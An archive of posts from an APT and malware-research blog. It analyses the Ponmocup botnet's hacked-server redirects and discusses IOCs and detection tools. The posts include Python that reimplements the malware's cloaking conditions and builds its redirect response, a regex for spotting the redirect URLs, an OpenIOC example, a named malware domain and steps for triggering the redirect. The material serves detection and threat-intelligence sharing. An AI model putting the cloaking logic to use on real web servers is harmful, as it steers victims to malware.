week, HttpOnly), and the cookie condition then suppresses further redirects for that browser. So a victim is only redirected once, and an analyst who wants to reproduce the redirect from a browser has to clear that cookie (or send none) first.<br /><br />The malware domain and the parameters of the redirection URL (sa, source, cd, ved, url, ei, usg, sig2) are random on each infected web server, but constant on each server for every redirect (except for the "url" parameter, which carries the original host and path). Samples are in <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains_2012-03-08.htm">this list</a>.<br /><br />A new discovery is that the subdomain of the redirection domains (starting with "<span style="font-family:courier new;">*.</span>" in the list of domains above) is the source port of the victim's TCP connection (<span style="font-family:courier new;">%{REMOTE_PORT}</span>), so it is a purely numeric label that should be between 1025 and 65535 (Windows XP picks ephemeral ports from 1025 upwards, Vista and later from 49152 to 65535). 
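<br /><br />To make the cloaking logic concrete, here is an added example of my own (not code from the .htaccess file, from this blog post or from the Ponmocup operators) that models the conditions above in Python and also recognises URLs of the resulting shape. The referrer and user-agent lists are shortened assumptions standing in for the long alternation lists in the real file; the redirect domain and the constant query parameters are taken from the RewriteRule in the listing; the sample request is constructed.<br /><br />

```python
import re

# Added example, not code from the blog post or from the .htaccess file: a Python model
# of the cloaking conditions listed above, plus a check for URLs of the resulting shape.
# The referrer and user-agent lists are deliberately SHORTENED ASSUMPTIONS standing in
# for the long alternation lists in the real file; the redirect domain and the constant
# query parameters are copied from the RewriteRule in the listing.

# line 1519: referrer must come from a search engine or social site (pipes restored, list cut down)
SEARCH_REFERER = re.compile(
    r"^(https?://)?([^/?]*\.)?(wordpress|twitter|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|aol\.|lycos\.)",
    re.I)
# line 1521: ...but not from an image search result page
IMAGE_SEARCH = re.compile(r"imgres\?q", re.I)
# lines 1523-1567: crawlers, feed readers, download tools, old Windows and non-Windows platforms
EXCLUDED_UA = re.compile(
    r"(bot|spider|crawl|curl|wget|libwww|python|perl|java|lynx|wordpress|"
    r"linux|freebsd|openbsd|netbsd|sunos|macintosh|mac\sos|mac_powerpc|"
    r"windows\s95|windows\s98|windows\sce|windows\snt\s4)",
    re.I)
# line 1569: no redirect for image or archive downloads
STATIC_FILE = re.compile(r"\.(jpe?g|gif|png|mpg|avi|zip|gz|tar|ico)$", re.I)
COOKIE_NAME = "ejJ"                      # line 1571 and the CO= flag of line 1577
REDIRECT_DOMAIN = "puritanhardrive.com"  # line 1577

# Constructed sample request: a Windows/IE user arriving from a Google search result.
SAMPLE_REQUEST = {
    "method": "GET", "host": "www.example.org", "path": "/index.php", "https": False,
    "referer": "http://www.google.com/search?q=free+ebook+download",
    "user_agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
    "cookie": "",
}


def should_redirect(req):
    """True when every RewriteCond matches, i.e. the request would be redirected."""
    ua = req.get("user_agent", "")
    referer = req.get("referer", "")
    return (
        req.get("method") == "GET"
        and bool(SEARCH_REFERER.search(referer))        # came from a search engine / social site
        and not IMAGE_SEARCH.search(referer)            # ...but not from an image search
        and not EXCLUDED_UA.search(ua)                  # not a crawler, tool or non-Windows client
        and not STATIC_FILE.search(req.get("path", ""))  # not an image/archive request
        and COOKIE_NAME not in req.get("cookie", "")    # not redirected before
        and bool(re.search("Windows", ua, re.I))        # a Windows browser
        and not req.get("https", False)                 # plain HTTP only
    )


def redirect_response(req, remote_port):
    """The 302 the hacked server sends: (status, Location, Set-Cookie), or None."""
    if not should_redirect(req):
        return None
    location = (
        f"http://{remote_port}.{REDIRECT_DOMAIN}/url?sa=X&source=web&cd=39&ved=0FLFQWdF5"
        f"&url=http://{req['host']}{req['path']}"
        f"&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H"
    )
    # CO=ejJ:43:%{HTTP_HOST}:10549:/:0:HttpOnly = name:value:domain:lifetime(min):path:secure:httponly
    # (mod_rewrite emits an absolute expires= date; Max-Age keeps the model simple)
    set_cookie = f"{COOKIE_NAME}=43; Domain={req['host']}; Path=/; Max-Age={10549 * 60}; HttpOnly"
    return 302, location, set_cookie


# Detection side: the Location above has a purely numeric source-port label in front of the
# redirect domain and a fake Google-style query; real search-engine links never have that label.
REDIRECT_SHAPE = re.compile(
    r"^http://(\d{4,5})\.([a-z0-9.-]+)/url\?(?=.*\bsa=X\b)(?=.*\bsource=web\b)(?=.*\bcd=\d+)(?=.*\burl=http)",
    re.I)


def redirect_domain_from_url(url):
    """Return the redirect domain when the URL has that shape (port label in the ephemeral
    range 1025-65535), otherwise None; the returned domain is a blocklist candidate."""
    m = REDIRECT_SHAPE.match(url)
    if not m or not 1025 <= int(m.group(1)) <= 65535:
        return None
    return m.group(2).lower()
```

Reproducing the redirect from the command line therefore means sending a search-engine Referer, a Windows browser User-Agent and no ejJ cookie over plain HTTP; the default User-Agent of curl or wget is filtered out, and a second request from the same browser is silently served the normal page because of the cookie.<br /><br />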
Looking for purely numeric 4-5 digit subdomains in DNS or proxy logs could therefore help discover such redirection domains before they are known or even registered.<br /><br />If you find this info useful, spread the word (or link) ;-)<br /><br /><strong><em>Updated on 2012-04-14</em></strong><br /><br />Many A/V products seem very ineffective at detecting this malware. Check out this analysis from a couple of months ago:<br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html</a><br /><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt</a><br /><br />Checking for a couple of registry keys should be an easy way to detect infected systems. Here's an IOC that should do this:<br /><a href="http://ioc.forensicartifacts.com/2012/04/ponmocup-2/">http://ioc.forensicartifacts.com/2012/04/ponmocup-2/</a><br /><a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet">https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet</a><br /><br />I would be really interested to hear whether you get hits (true or false positives) on this IOC. Thanks for any feedback.<br /><br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com4tag:blogger.com,1999:blog-4767199732858434539.post-87470754130678405612012-02-18T15:35:00.001-08:002012-04-27T15:12:55.600-07:00Not APT, but nasty malware (Ponmocup botnet)<span style="font-family:arial;">For once I don't write about APT, but about some nasty malware / botnet that I've been researching for almost a year. 
It's been called "Ponmocup botnet", but the malware has been called many different names (Ponmocup, Pirminay, Kryptik, Swisyn, Vundo etc).</span><br style="font-family:arial;"><br style="font-family:arial;"><span style="font-family:arial;">I've been putting most of my research on a privately hosted page here:</span><br style="font-family:arial;"><a style="font-family: arial;" href="http://www9.dyndns-server.com:8080/pub/botnet-links.html">http://www9.dyndns-server.com:8080/pub/botnet-links.html</a><br style="font-family:arial;"><span style="font-family:arial;">(Sorry about the bad formatting and strange URL)</span><br style="font-family:arial;"><br style="font-family:arial;"><span style="font-family:arial;">My very latest "OSINT research" is on the following page:</span><br style="font-family:arial;"><a style="font-family: arial;" href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html">http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html</a><br style="font-family:arial;"><span style="font-family:arial;">It shows that you can find many (recent and old) analysis reports just by googling a couple of registry keys or domains. These would also be good indicators to look for (hint).</span>
<br /><br style="font-family:arial;"><span style="font-family:arial;">My biggest questions are:</span><br style="font-family:arial;"><ul><li><pre style="font-family: arial;">Why is this malware known under so many different names?
<br />(Ponmocup, Pirminay, Kryptik, Swisyn, Vundo etc.)</pre></li><li><pre style="font-family: arial;">Why aren't AV companies connecting the dots? </pre></li></ul><span style="font-family:arial;">There is one indicator (registry key) that I believe to be very effective and accurate, but I don't have any hard evidence (besides all these analysis reports) to support this.
<br /></span><blockquote><pre>the existence or creation of a registry key, namely
<br />"HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\
<br />INTERNET SETTINGS\6"
<br />and/or
<br />"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\
<br />INTERNET SETTINGS\6"</pre><span style="font-family:arial;"></span></blockquote><span style="font-family:arial;">So I would be interested to know if these keys exist on a clean system under any circumstance?
<br />
<br />There has been some cooperation to create IOCs and ET snort rules to detect this malware:</span><br style="font-family:arial;"><a style="font-family: arial;" href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet">https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet</a><br style="font-family:arial;"><a style="font-family: arial;" href="http://ioc.forensicartifacts.com/2012/01/ponmocup/">http://ioc.forensicartifacts.com/2012/01/ponmocup/</a><br style="font-family:arial;"><a style="font-family: arial;" href="http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup">http://doc.emergingthreats.net/bin/view/Main/WebSearch?search=Ponmocup</a><br style="font-family:arial;"><br face="arial"><span style="font-family:arial;">A friend of mine (from the </span><a style="font-family: arial;" href="http://www.abuse.ch/">abuse.ch blog</a><span style="font-family:arial;"> and </span><a style="font-family: arial;" href="https://zeustracker.abuse.ch/">zeustracker</a><span style="font-family:arial;">) was able to sinkhole some C&C domains for a while to estimate the botnet size, and it seemed quite big at the time (April to May 2011):</span><br face="arial"><a style="font-family: arial;" href="http://www.abuse.ch/?p=3294">How Big is Big? 
Some Botnet Statistics</a><br face="arial"><br face="arial"><span style="font-family:arial;">By the way, I've been </span><a style="font-family: arial;" href="https://twitter.com/BestOf_cAPTure/favorites">tweeting</a><span style="font-family:arial;"> about some general malware threat intel recently, which caught some attention on Digital4rensics blog (thanks Keith!)</span><br face="arial"><a style="font-family: arial;" href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/">http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/</a><br face="arial"><a style="font-family: arial;" href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/">http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/</a><br face="arial"><br face="arial"><span style="font-family:arial;">How do you share your malware and threat intelligence?</span><br face="arial"><span style="font-family:arial;">Do you know of better ways or platforms to do it?</span><br style="font-family: arial;"><br style="font-family: arial;"><span style="font-family:arial;">Feedback is welcome!</span><br style="font-family: arial;"><br style="font-family: arial;">
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-51872316847106145572011-11-19T14:24:00.001-08:002012-04-27T15:23:12.557-07:00Finding Malware and APT activities<div style="text-align: center;"><span style="font-style: italic;font-family:arial;font-size:100%;" >Updates and feedback will be posted as comments below (unless I choose otherwise)</span>
<br /></div><span style="font-family:arial;font-size:100%;">
<br />There are two ways to find infected or breached systems that I know of:
<br />First, looking for known (or suspicious) command and control (C&C) traffic on the network. Second, looking for known bad or suspicious indicators on the hosts.
<br />Well, there's actually a third one, combining the two together.
<br />
<br /><span style="font-weight: bold;">Indicators of Compromise</span>
<br />
<br />Mandiant's Indicators of Compromise (IOC) provide a way to describe host and network based indicators of malicious activity or traits.
<br /><a href="http://www.mandiant.com/products/free_software/ioceditor/">IOC Editor</a> is free software to create IOCs, and there is even a free tool, <a href="http://www.mandiant.com/products/free_software/iocfinder/">IOC Finder</a>, to check hosts for signs of infection. However, IOC Finder has only limited capability to check for network based indicators on hosts. The commercial product MIR should have much greater network based capabilities, I assume.
<br />For sharing IOCs I found these two sites, <a href="http://openioc.org/">openIOC</a> and Mandiant's <a href="https://forums.mandiant.com/forum/ioc-finder">forums about IOC Finder</a>.
<br />Thanks Mandiant for all your great free software and resources!
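<br /><br />As an added example of my own (not one of the Ponmocup IOCs linked from this blog), here is what such an IOC looks like in the OpenIOC format, and how little code is needed to apply its boolean logic to data collected from a host: the registry key from the previous post and one of the redirect domains, combined with OR. The GUID-style ids are placeholders, the term names RegistryItem/KeyPath and DnsEntryItem/Host are my assumption about the IOC Finder vocabulary, and the host data passed to host_matches() is constructed.<br /><br />

```python
import xml.etree.ElementTree as ET

NS = {"ioc": "http://schemas.mandiant.com/2010/ioc"}

# Constructed OpenIOC 1.0 document (my own example, NOT the IOC published at
# ioc.forensicartifacts.com). The ids are placeholders; the term names
# RegistryItem/KeyPath and DnsEntryItem/Host are my assumption about the IOC Finder
# vocabulary; the values are the registry key and one domain from this blog.
PONMOCUP_IOC = r"""<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns="http://schemas.mandiant.com/2010/ioc" id="a0000000-0000-4000-8000-000000000001" last-modified="2012-04-14T00:00:00">
  <short_description>Ponmocup (example)</short_description>
  <description>Registry key created by the malware, or its redirect domain in the DNS cache.</description>
  <keywords />
  <authored_by>example</authored_by>
  <authored_date>2012-04-14T00:00:00</authored_date>
  <links />
  <definition>
    <Indicator operator="OR" id="a0000000-0000-4000-8000-000000000002">
      <IndicatorItem id="a0000000-0000-4000-8000-000000000003" condition="is">
        <Context document="RegistryItem" search="RegistryItem/KeyPath" type="mir" />
        <Content type="string">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\6</Content>
      </IndicatorItem>
      <IndicatorItem id="a0000000-0000-4000-8000-000000000004" condition="is">
        <Context document="RegistryItem" search="RegistryItem/KeyPath" type="mir" />
        <Content type="string">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\6</Content>
      </IndicatorItem>
      <IndicatorItem id="a0000000-0000-4000-8000-000000000005" condition="contains">
        <Context document="DnsEntryItem" search="DnsEntryItem/Host" type="mir" />
        <Content type="string">puritanhardrive.com</Content>
      </IndicatorItem>
    </Indicator>
  </definition>
</ioc>
"""


def parse_openioc(xml_text):
    """Turn the <definition> of an OpenIOC document into a nested logic tree."""
    root = ET.fromstring(xml_text)
    return _indicator(root.find("ioc:definition/ioc:Indicator", NS))


def _indicator(el):
    node = {"operator": el.get("operator", "OR"), "items": [], "children": []}
    for item in el.findall("ioc:IndicatorItem", NS):
        ctx = item.find("ioc:Context", NS)
        node["items"].append({
            "search": ctx.get("search"),
            "condition": item.get("condition"),
            "content": item.find("ioc:Content", NS).text,
        })
    node["children"] = [_indicator(c) for c in el.findall("ioc:Indicator", NS)]
    return node


def _item_matches(item, observed):
    """Apply one IndicatorItem to the values collected for its search term."""
    values = [v.lower() for v in observed.get(item["search"], ())]
    needle = item["content"].lower()
    if item["condition"] == "is":
        return needle in values
    if item["condition"] == "contains":
        return any(needle in v for v in values)
    raise ValueError("unsupported condition: " + item["condition"])


def evaluate(node, observed):
    """observed maps a search term (e.g. 'RegistryItem/KeyPath') to the values collected
    from one host; returns True when the IOC's AND/OR tree is satisfied."""
    results = [_item_matches(i, observed) for i in node["items"]]
    results += [evaluate(c, observed) for c in node["children"]]
    if not results:
        return False
    return any(results) if node["operator"].upper() == "OR" else all(results)


def host_matches(xml_text, observed):
    return evaluate(parse_openioc(xml_text), observed)
```

Nesting an Indicator with operator AND inside the OR is how a weak indicator (a common file name, say) gets tied to a stronger one; evaluate() recurses into children, so such nesting works unchanged. Collecting the observed values is the part the free IOC Finder does for you.<br /><br />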
<br />
<br /><span style="font-weight: bold;">Network based indicators</span>
<br />
<br />Another solution that looks very promising is <a href="http://www.damballa.com/solutions/damballa_failsafe.php">Damballa's Failsafe</a>, which looks for known bad or suspicious network traffic (DNS, proxy, egress firewall).
<br />There are some <a href="http://www.damballa.com/solutions/demo_load.php">demo videos</a> online available with free registration.
<br />
<br />Something similar seems to be available from <a href="http://trisul.org/">Trisul Networks Analytics</a>. A limited version is available for free. The plugins Badfellas, GeoIP and URLFilter look interesting and promising.
<br />
<br />If you have experience with one of these products or know of similar ones, I'd be interested to hear about it.
<br />
<br />Any network based solution I guess is only as good as the intelligence of known bad or suspicious patterns to look for.
<br />For some IDS based open source solutions, you might find </span><span style="font-family:arial;">Richard Bejtlich's blog post "</span><a style="font-family: arial;" href="http://taosecurity.blogspot.com/2011/01/seven-cool-open-source-projects-for.html">Seven Cool Open Source Projects for Defenders</a><span style="font-family:arial;">" interesting.</span>
<br /><span style="font-family:arial;font-size:100%;">
<br /><span style="font-weight: bold;">Host based indicators</span>
<br />
<br />The host based approach is to look at the memory or disk (binaries, registry, services etc.) for known malware or suspicious patterns. There are certainly many ways to do this besides the already mentioned solutions from Mandiant (and HBGary in a previous post).
<br />Other <a href="http://www.mandiant.com/products/free_software">free tools</a> from Mandiant to check out are Memoryze, Audit Viewer and Redline to inspect memory for malicious or suspicious signs.
<br />
<br />David Hoelzer has some interesting <a href="http://auditcasts.com/screencasts/">screencasts</a> and <a href="http://it-audit.sans.org/blog/">blog posts</a> (including scripts) about finding signs of infection.
<br />
<br /></span><span style="font-family:arial;font-size:100%;"><a href="http://auditcasts.com/screencasts/19-detecting-signs-of-apt-and-malware"># 19 : Detecting Signs of APT and Malware</a>
<br /><a href="http://auditcasts.com/screencasts/18-detecting-apt-and-malware-through-baseline-auditing"># 18 : Detecting APT and Malware through Baseline Auditing</a></span><span style="font-family:arial;font-size:100%;">
<br /><a href="http://it-audit.sans.org/blog/2011/10/17/detecting-malware-apt-like-threats-domain-wide-file-finder" title="Detecting Malware & APT Like Threats - Domain Wide File Finder">Detecting Malware & APT Like Threats - Domain Wide File Finder</a>
<br /></span><span style="font-family:arial;font-size:100%;"><a href="http://it-audit.sans.org/blog/2011/10/11/detecting-apt-and-other-zero-day-malware-through-service-auditing" title="Detecting APT and Other Zero Day Malware through Service Auditing">Detecting APT and Other Zero Day Malware through Service Auditing</a></span><span style="font-family:arial;font-size:100%;">
<br />
<br />There are also some open source projects like <a href="http://mirror.codeplex.com/">MIR-ROR</a>, <a href="http://code.google.com/p/rapier/">Rapier</a> and probably others I haven't looked at. The two mentioned above haven't been active for a while now.
<br />
<br /><span style="font-weight: bold;">Feedback welcome</span>
<br />
<br />If you have corrections, suggestions or other feedback, please contact me (toms.security.stuff at gmail dot com).
<br />
<br />If you found my blog other than from my Twitter profile, feel free to <a href="https://twitter.com/#%21/c_APT_ure/followers">follow</a> me there (<a href="https://twitter.com/c_APT_ure">@c_APT_ure</a>)
<br />
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-76445241685226762011-08-13T15:09:00.001-07:002012-04-27T15:22:07.328-07:00Lots has hAP(T)ened since... Kill those Shady RATs...<span style="font-family:arial;">Well, it's been a long time since my last post and lots has happened since. Where should I start...</span>
<br />
<br /><span style="font-family:arial;">Earlier this year there were details released about </span><a style="font-family: arial;" href="http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf">Operation Night Dragon</a><span style="font-family:arial;">.</span>
<br />
<br /><span style="font-family:arial;">Mandiant released its <a href="http://www.mandiant.com/news_events/forms/m-trends_2011">second M-Trends report</a> ("when prevention fails"), also mentioned on</span><span style="font-family:arial;"> </span><a style="font-family: arial;" href="http://www.businesswire.com/news/home/20110127006206/en/MANDIANT-Releases-M-Trends-Prevention-Fails-U.S.-Department">Businesswire</a><span style="font-family:arial;">. There were also some new, interesting "State of the Hack" and "Fresh Prints of Malware" </span><a style="font-family: arial;" href="http://www.mandiant.com/index.php/news_events/presentation_archives">presentations</a><span style="font-family:arial;">.</span>
<br />
<br /><span style="font-family:arial;">And most recently, there was lots of news about the "</span><a style="font-family: arial;" href="http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf">Operation Shady RAT</a><span style="font-family:arial;">".</span>
<br /><span style="font-family:arial;">Read </span><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9219107/Ira_Winkler_Shady_RAT_case_shows_vendors_as_big_a_problem_as_APT_itself">Ira Winkler's article</a><span style="font-family:arial;"> about it and make your own opinion.</span>
<br /><span style="font-family:arial;">I'd like to cite one paragraph of it:</span>
<br /><blockquote>"This is the root of the problem with how security vendors are dealing with the chronic issue of APT. They treat their customers' misery as their own intellectual property. Companies that investigate APT-related attacks rarely share their findings. They don't exchange information about the most recent malware obfuscation techniques, the best methods to identify compromised systems, the newest malware signatures, etc. Instead, they keep most of the information to themselves and treat it as a competitive advantage. What sharing there is falls far short of what would be required to encourage a robust response capability."</blockquote><span style="font-family:arial;">So what are Indicators of Compromise (IOCs) good for? Well, if they only get used by one security company, they can't reach their full potential.</span>
<br /><span style="font-family:arial;">Or are IOCs widely used and shared and I just don't know about it? Please let me know.</span>
<br />
<br /><span style="font-family:arial;">And then there's yet another interesting paper linked in there, which I've previously found, but haven't fully read yet.</span>
<br /><blockquote>"Far more information about this sort of thing came out in 2009, when The US-China Economic and Security Review Commission released a Northrop Grumman-prepared report called "<a href="http://www.uscc.gov/researchpapers/2009/NorthropGrumman_PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf">Capability of the People's Republic of China to Conduct Cyber Warfare and Computer Network Exploitation</a>". That paper is infinitely more informative than anything that any security company has been willing to disclose."
<br /></blockquote><span style="font-family:arial;">Well, now it's time to read it. (before it gets too outdated)</span>
<br />
TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-88771462532681234852010-09-03T13:28:00.001-07:002012-04-27T15:15:02.679-07:00Mandiant's "Indicator of Compromise" (IOC) -- Part 2<span style=";font-family:arial;font-size:100%;" >Well, lots has happened since my last blog post. I'll try to focus on the things about APT and IOC that might interest you.
<br />
<br />Mandiant had some interesting presentations about IOC and released the free tool <a href="http://www.mandiant.com/products/free_software/ioce/">IOCe</a> to create them. There's also a <a href="https://forums.mandiant.com/forum/open-ioc">forum about OpenIOC</a>.
<br /></span><ul style="font-family:arial;"><li style="font-family:arial;"><h3 style="font-weight: normal;"><span style="font-size:100%;"><a href="http://www.mandiant.com/presentations/state_of_the_hack_abcs_of_ioc/">State of the Hack: ABCs of IOC</a> (May 24, 2010)</span></h3></li><li><h3 style="font-weight: normal;"><span style="font-family:arial;font-size:100%;"><a href="http://www.mandiant.com/presentations/fresh_prints_of_mal-ware_0x10x20x3s_of_ioc/">Fresh Prints of Mal-ware: 0x1,0x2,0x3s of IOC</a> (Aug 26, 2010)</span>
<br /></h3></li></ul><span style=";font-family:arial;font-size:100%;" >So there's the long overdue update on IOC.
<br />
<br />Lots of other interesting things to talk about... as soon as I find time to write more :-)
<br />
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-87195860766814286262010-04-09T15:04:00.001-07:002012-04-27T15:17:56.083-07:00Are all these APT?<span style="font-family:arial;">Would you agree that all of the following are connected to the APT? What else is missing?</span>
<br /><ul style="font-family: arial;"><li>Operation Aurora</li><li><del>Mariposa Botnet</del></li><li>GhostNet</li><li>Shadow network</li></ul><span style="font-family:arial;">Here are some interesting posts, articles and papers supporting this:</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9163158/More_than_100_companies_targeted_by_Google_hackers">More than 100 companies targeted by Google hackers</a>
<br /><span style="font-family:arial;">The attack was larger than initially thought</span>
<br />
<br /><span style="font-style: italic;font-family:arial;" >"ISec Partners has published </span><a style="font-weight: bold; font-family: arial; font-style: italic;" href="https://www.isecpartners.com/files/iSEC_Aurora_Response_Recommendations.pdf">technical recommendations</a><span style="font-style: italic;font-family:arial;" > for companies to follow in order to mitigate the Aurora risk."</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9169598/Security_industry_faces_attacks_it_cannot_stop">Security industry faces attacks it cannot stop
<br /></a><span style="font-family:arial;">Analysis: Today's security products not much help for advanced persistent threat attacks</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174861/Update_Researchers_track_cyber_espionage_ring_to_China">Update: Researchers track cyber-espionage ring to China</a>
<br /><span style="font-family:arial;">'Shadow' network detailed in report Tuesday by the Information Warfare Monitor</span>
<br /><span style="font-family:arial;">>>> </span><a style="font-family: arial;" href="http://shadows-in-the-cloud.net/">http://shadows-in-the-cloud.net/</a><span style="font-family:arial;"> <<<</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174559/Targeted_cyberattacks_test_enterprise_security_controls">Targeted cyberattacks test enterprise security controls</a>
<br /><span style="font-family:arial;">Instead of prevention, the real focus should be attack mitigation</span>
<br />
<br /><a style="font-family: arial;" href="http://www.computerworld.com/s/article/9174558/After_Google_China_dust_up_cyberwar_emerges_as_a_threat">After Google-China dust-up, cyberwar emerges as a threat</a>
<br /><span style="font-family:arial;">The episode highlighted cyberthreats facing the U.S., but it's not a war -- yet
<br />
<br /><span style="font-weight: bold;">Update 24/04/2010:</span>
<br />
<br />Thanks Richard for the correction in your comment. I think I was misled by the mention of the Mariposa Botnet and APT in the same paragraph in several posts. But on re-reading them, they do not make a connection between the two (except maybe that the usual security devices failed on both).
<br />
<br /><a href="http://www.cio.com/article/574563/Security_Industry_Faces_Attacks_it_Cannot_Stop">http://www.cio.com/article/574563/Security_Industry_Faces_Attacks_it_Cannot_Stop</a>
<br />
<br /><a href="http://www.blackhatsolutions.com/companynews/update_security_industry_faces_attacks_it_cannot_stop/">http://www.blackhatsolutions.com/companynews/update_security_industry_faces_attacks_it_cannot_stop/</a>
<br />
<br /><span style="font-style: italic;">"The big news at the show had to do with the takedown of the Mariposa botnet -- a massive network of hacked computers that has infected half of the Fortune 100 companies. So-called advanced persistent threat (APT) attacks, such as the one that compromised Google systems in early December, were another hot topic.</span>
<br />
<br /><span style="font-style: italic;">Both Mariposa and the Google attacks illustrate the same thing, however. Despite billions of dollars in security spending, it's still surprisingly hard to keep corporate networks safe."</span>
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com1tag:blogger.com,1999:blog-4767199732858434539.post-70369325782636383022010-04-09T14:01:00.001-07:002012-04-27T15:16:28.458-07:00Mandiant's "Indicator of Compromise" (IOC)<span style="font-family: arial;font-size:100%;" >There's another interesting approach from Mandiant:
<br />
<br /><a href="http://blog.mandiant.com/archives/766">Combat the APT by Sharing Indicators of Compromise</a> (IOC)
<br />
<br /><span style="font-style: italic;">"At DoD CyberCrime 2010 MANDIANT will formally release this format and tools to leverage it in your investigations today. We’ll have full coverage of the release on M-unition – stay tuned."</span>
<br />
<br />There's also a <a href="http://groups.google.com/group/ioc-malware">Google Group about IOC</a>. But are there any tools available yet, or any IOCs? <br />
<br />I'll update when I find out.
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-84633273469118307432010-03-28T13:56:00.001-07:002012-04-27T15:19:46.270-07:00Commercial products against APT -- useful or useless?<span style=";font-family:arial;font-size:100%;" >If money is not an issue to your company...
<br />
<br />Here are some commercial products that could help in identification (and possibly remediation) of APT infections:</span>
<br /><ul style="font-family: arial;"><li><a href="http://www.mandiant.com/products/core/intelligent_response/">Mandiant Intelligent Response</a></li><li><a href="https://www.hbgary.com/products-services/responder-pro/">HBGary - Responder Professional</a></li><li>Damballa's <a href="http://www.damballa.com/solutions/index.php">Failsafe Solution</a> and <a href="http://landing.damballa.com/APTAudit.html">APT-Audit</a></li></ul><span style="font-family:arial;">If you have experiences with these products or know other solutions along this line, please <a href="mailto:toms.security.stuff@gmail.tld?subject=replace-tld%21">contact me</a>.</span>
<br />
<br /><span style="font-family:arial;">In this blog I would like to explore how to identify APT infections with freely available tools (like the ones from Mandiant and others) and maybe custom scripts.</span>
<br />
<br /><span style="font-family:arial;">Mandiant's webinar "</span><a style="font-family: arial;" href="http://www.mandiant.com/presentations/fresh_prints_malware_behaving_badly/">Fresh Prints: Malware Behaving Badly</a><span style="font-family:arial;">" covers some details that I would like to dive into. The "<a href="http://blog.mandiant.com/archives/782">Malware Rating Index</a>" (MRI) in the free software Audit Viewer sounds interesting.</span>
<br />
<br /><span style=";font-family:arial;font-size:100%;" >*** Disclaimer: I'm not affiliated with any of the companies linked in this blog ***
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-7874098036665243282010-03-26T17:12:00.000-07:002011-11-19T13:03:42.196-08:00how do you un-bunch your panties?<span style="font-size:100%;"><span style="font-family:arial;">Here's a funny (in some ways) post on ZDnet from </span><strong style="font-family: arial; font-weight: normal;">Matthew Olney:</strong></span>
<br /><a href="http://blogs.zdnet.com/security/?p=5691"><span style="font-size:100%;">Advanced Persistent Threats: Should your panties be in a bunch, and how do you un-bunch them?</span></a>
<br />
<br /><ol><li value="2">Your APT definition should be: <span style="font-style: italic;">“APT: There are people smarter than you, they have more resources than you, and they are coming for you. Good luck with that.”</span></li></ol>
<br /><span style="font-size:100%; font-family:arial;">
<br />Enjoy!
<br /></span>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-31281395476587482922010-03-26T14:56:00.000-07:002011-11-19T13:03:07.041-08:00First blog, first post...<span style="font-size:100%;"><span style="font-family:arial;">This is yet another blog about <a href="http://en.wikipedia.org/wiki/Advanced_Persistent_Threat">APT</a> (if you don't know what this stands for, you're in the wrong place or need to read on).</span><span style="font-family:arial;">
<br />
<br />It's dedicated to sharing interesting (in my opinion) links to APT resources, and some of the most interesting facts from each link (only when I have spare time).</span><span style="font-family:arial;">
<br />
<br />The blog title is a play on "capture the APT". The main topic will be how to identify (and maybe remediate) APT-infected systems.</span><span style="font-family:arial;">
<br />
<br />If you have suggestions for additional resources or if you find incorrect facts on here, please email me (</span><span class="login" style="font-family:arial;">toms.security.stuff@gmail.tld -- you should know the TLD of gmail, starts with a 'C' and ends with 'OM').</span><span style="font-family:arial;">
<br />
